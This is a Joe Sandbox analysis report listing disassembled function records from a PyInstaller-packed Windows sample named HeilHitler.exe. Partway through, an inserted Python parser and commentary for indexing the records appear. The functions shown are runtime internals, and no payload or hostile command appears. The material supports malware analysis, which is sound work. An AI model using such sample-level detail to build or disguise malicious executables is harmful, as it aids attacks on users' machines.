                                                                                                                                                                                                                                            • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                            • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                            • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                            • Instruction ID: 2ac7761fc5d2d0ce4d1714a694a1c284d2a48211121f43196110f73418939675
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1821B232A19B8192E720DB91F8427E673A4FB88784F801235FE9DA3759DF3CE1459740
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                            • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                            • Instruction ID: 6e70702f8cc8c05fd7e2224f32638cf4824501ea2af2367d430ac242eaca4e9f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF04F21B0A70681EA108FA4E49677A6320BF45761F541339D67E9A7E4DF3CE048E740
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                                            • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                            • Instruction ID: 1740fa7dea82f0db993d721bdbc789fe3a290f01ab4c766d09565ea55d8dcb9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A114F22E5CA0302FA6512EAE4973791150EF59364E046734EAEFFE7DA8E7CB8416104
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3AF
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3CE
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B3F6
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B407
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D7A5A3,?,?,00000000,00007FF633D7A83E,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7B418
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                            • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                            • Instruction ID: ca50551e65363582523f6374fa265e7449db3506ccfaf416f793eb32d8966603
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9115E20F0C64281FA689FB5955367962465F447B4F888334E93EFB7D6DE2CE452A300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                            • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                            • Instruction ID: 6eab562e1d83f5d882c4aa02a22574ba7fae9327a1151a8ca1ce9ebb4e4ec727
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38113920E0E20781FAA86EF1442367E12424F45370F084734D93EFA7D2DD2CB9507341
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                            • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                            • Instruction ID: 5bfbfe9ee72169a339b73ff0211cb6058e7213603982fe5c203b5fe916921353
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8291F232A08A4685F7658EA4D45637D37A1AB40B94F844336DE9DE33D6FF3CE849A300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                            • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                            • Instruction ID: 6d0f7454b8fec6c00dd6cf00228ac33d822e6e7074f624caf0611361992f1dec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0881CD72E0821385F7749EA9815227826A8EB11B48F558735DA2DFF389CF2DE941B702
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
• Instruction ID: 61be1db25d527b0826e63ee315ab3468e3c2d08d298a55817cdb556ed082ef50
• Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
• Instruction Fuzzy Hash: 5F51BF32B196428ADB14CF95F445A787391FB44B98F918230DA6EA779CEF7CE841D700
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
• Instruction ID: 3fcdcd1c0f0ea58bf7fcc9dfd958138af5f85b08eccddb40698e0f4ea41e857b
• Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
• Instruction Fuzzy Hash: B651A332A08B428AEB748FA1D14526837A8FB54B84F945336DA6DABB95CF3CF450D701
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
• Instruction ID: 8358b9b083ad9bcf205d14673147ecac64c4f19881dc2d13d781748a40487605
• Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
• Instruction Fuzzy Hash: 0061A232908BC586DB208F65E4413AAB7A4FB947C4F444325EBAC57B99DF7CE194CB00
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF633D6352C,?,00000000,00007FF633D63F1B), ref: 00007FF633D67F32
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\
• API String ID: 4241100979-1685191245
• Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
• Instruction ID: 1bc1189d81329e79b0f594df65f4b7a7ddf4bfb33ccbd971c0db40d7ffe78eff
• Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
• Instruction Fuzzy Hash: B031E621619AC645FA219B61E8127AA7358EF84BE4F800331FE7D977C9EF3CD6059700
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Message
• String ID: ERROR$Error$[PYI-%d:%ls]
• API String ID: 2030045667-255084403
• Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
• Instruction ID: cb4500abcac2290a2ecdb12b620301205265b60e94a368f1fe62eb829fa546cd
• Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
• Instruction Fuzzy Hash: DC21F772708B4191E7109B94F8467EA7360FB88784F805236EE8DA7756DF3CD255D740
APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
• Instruction ID: 4011ab1016f224084199e4224510aeb5237c71053e27409bc8eec7eb2664b866
• Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
• Instruction Fuzzy Hash: A9D1FEB2B18A818EE750CFA5D4412AC37B1FB54B98B444336DE5EA7B99DF38E116D300
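The function records above are easier to work with as structured data than as a page of bullets: an analyst typically wants to ask which function references a given string, to rebase the `ref:` call-site addresses to RVAs in the dumped PE, or to compare Opcode IDs between two reports (in every record on this page the Opcode ID is identical to the Opcode Fuzzy Hash, so an exact match is the cheap first check for code reuse). The parser below is an added example written for this page; it is not Joe Sandbox code. It assumes the plain-text layout shown here (each record opens with an `APIs` header and the `String ID` field joins referenced strings with `$`) and uses a trimmed two-record excerpt copied from the listing as its sample input.

```python
"""Parse Joe Sandbox function records (the APIs / Strings / Memory Dump
Source / Joe Sandbox IDA Plugin / Similarity blocks) into dicts.
Added example, not Joe Sandbox code: assumes each record starts at an
"APIs" header and that "String ID" joins referenced strings with "$"."""
import re

# Trimmed excerpt of two records from the listing above (indentation and
# "Download File" link text removed, some hash lines dropped for brevity).
SAMPLE = """\
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF633D6352C,?,00000000,00007FF633D63F1B), ref: 00007FF633D67F32
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\\
• API String ID: 4241100979-1685191245
• Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
• Instruction Fuzzy Hash: B031E621619AC645FA219B61E8127AA7358EF84BE4F800331FE7D977C9EF3CD6059700
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Message
• String ID: ERROR$Error$[PYI-%d:%ls]
• API String ID: 2030045667-255084403
• Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
• Instruction Fuzzy Hash: DC21F772708B4191E7109B94F8467EA7360FB88784F805236EE8DA7756DF3CD255D740
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source",
           "Joe Sandbox IDA Plugin", "Similarity"}
BULLET = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
# "• CreateDirectoryW.KERNEL32(a,b,...), ref: 00007FF633D67F32"
API_CALL = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")

def parse_records(text):
    """Return one dict per function record, in listing order."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                  # every record opens with this header
            rec = {"api_calls": [], "dumps": []}
            records.append(rec)
        if line in HEADERS:
            section = line
            continue
        if not line or rec is None:         # blank, or text before the first record
            continue
        if section == "APIs":
            m = API_CALL.match(line)
            if m:
                rec["api_calls"].append({
                    "name": m.group(1), "module": m.group(2),
                    "args": m.group(3).split(","), "ref": int(m.group(4), 16)})
            continue
        m = BULLET.match(line)
        if not m:
            continue
        if section == "Memory Dump Source": # Source File / Associated dumps
            rec["dumps"].append((m.group(1), m.group(2)))
        else:                               # IDA plugin and similarity fields
            rec[m.group(1)] = m.group(2)
    return records

def strings_of(rec):
    """Split the "$"-joined String ID; a referenced string that itself
    contains "$" cannot be told from the separator, so this is approximate."""
    sid = rec.get("String ID", "")
    return sid.split("$") if sid else []

def find_by_string(records, needle):
    """Records whose String ID contains exactly `needle`."""
    return [r for r in records if needle in strings_of(r)]

def call_rvas(rec):
    """Rebase each API call site from the dump's load address (the Offset
    on the Source File line) to an RVA inside the dumped PE."""
    base = None
    for key, value in rec["dumps"]:
        m = OFFSET.search(value) if key == "Source File" else None
        if m:
            base = int(m.group(1), 16)
    if base is None:
        return []
    return [(c["name"], c["ref"] - base) for c in rec["api_calls"]]
```

Running `find_by_string(parse_records(SAMPLE), "[PYI-%d:%ls]")` returns the `Message` record, and `call_rvas` on the `CreateDirectory` record rebases the `CreateDirectoryW` call site at 00007FF633D67F32 to RVA 0x7F32 against the 00007FF633D60000 dump base. The `[PYI-%d:%ls]` format is the `[PYI-<pid>:<level>]` prefix the PyInstaller bootloader puts on its error dialogs, so that record is the bootloader's fatal-error path rather than payload logic; the CRT-internal names in the neighbouring records (`__except_validate_context_record`, `_get_daylight`, `_isindst`, the `csm` C++ exception magic) are likewise runtime code and can be filtered out before spending time on similarity matching.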
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
APIs
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
APIs
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
APIs
Strings
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D79046
  • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
  • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF633D6CBA5), ref: 00007FF633D79064
Strings
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\HeilHitler.exe
• API String ID: 3580290477-2243985011
APIs
Strings
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                            • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
